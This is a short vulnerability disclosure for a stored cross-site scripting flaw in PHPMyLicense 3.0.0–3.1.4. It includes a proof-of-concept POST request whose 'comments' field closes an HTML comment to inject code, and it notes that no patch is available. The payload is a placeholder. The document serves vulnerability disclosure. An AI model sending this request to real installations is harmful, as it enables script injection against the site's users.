Hello, I want to report following exploit:


# Exploit Title: PHPMyLicense Stored Cross Site Scripting
# Date: 09-10-2015
# Exploit Author: Aria Akhavan Rezayat @ Websec GesmbH
# Website: https://websec-test.com
# Vendor Homepage: https://phpmylicense.com
# Software Link: http://codecanyon.net/item/phpmylicense/11719122
# Version: 3.0.0 - 3.1.4 (REQUIRED)
# Category: Webapps

1.) Description:

Any registered user can simply disable functionality of the whole application and input malicious code because of a lack of filtering.

2.) Proof of Concept:

localhost/phpmylicense/ajax/

POST:

comments=bla-->MaliciousCode<%21--&customer_email=bla&domain=bla&expirydate=26-10-2014&handler=newlicense&parameters=bla&productid=20&serialkey=bla&status=processing

3.) Solution:

None. - No Update available for it.